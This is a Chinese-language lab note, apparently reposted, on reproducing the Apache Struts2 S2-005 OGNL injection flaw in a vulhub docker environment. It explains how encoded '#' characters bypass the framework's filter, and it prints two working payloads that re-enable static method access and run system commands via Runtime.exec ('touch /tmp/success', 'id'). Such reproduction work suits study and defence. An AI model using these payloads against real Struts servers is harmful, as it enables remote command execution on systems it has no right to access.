Struts2漏洞S2-005复现笔记

Struts2漏洞S2-005复现笔记

漏洞原理

s2-005漏洞的起源源于S2-003(受影响版本: 低于Struts 2.0.12)，struts2会将http的每个参数名解析为OGNL语句执行(可理解为java代码)。OGNL表达式通过#来访问struts的对象，struts框架通过过滤#字符防止安全问题，然而通过unicode编码(\u0023)或8进制(\43)即绕过了安全限制，对于S2-003漏洞，官方通过增加安全配置(禁止静态方法调用和类方法执行等)来修补，但是安全配置被绕过再次导致了漏洞，攻击者可以利用OGNL表达式将这2个选项打开

影响版本：Struts 2.0.0-2.1.8.1

漏洞搭建

https://github.com/vulhub/vulhub/tree/master/struts2/s2-005

运行以下命令启动环境

docker-compose build
docker-compose up -d

搭建成功：

构建poc

使用抓包工具burp suite，修改数据包插入poc

('\u0023_memberAccess[\'allowStaticMethodAccess\']')(vaaa)=true&(aaaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023vccc')(\u0023vccc\u003dnew java.lang.Boolean("false")))&(asdf)(('\u0023rt.exec("touch@/tmp/success".split("@"))')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1

Poc2：

?'+(#_memberAccess["allowStaticMethodAccess"]=true,#context["xwork.MethodAccessor.denyMethodExecution"]=false,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream()))+'

查看数据连接状态

命令：

docker exec -it c25543ef6c4c /bin/bash

ls /tmp

这篇好文章是转载于：学新通技术网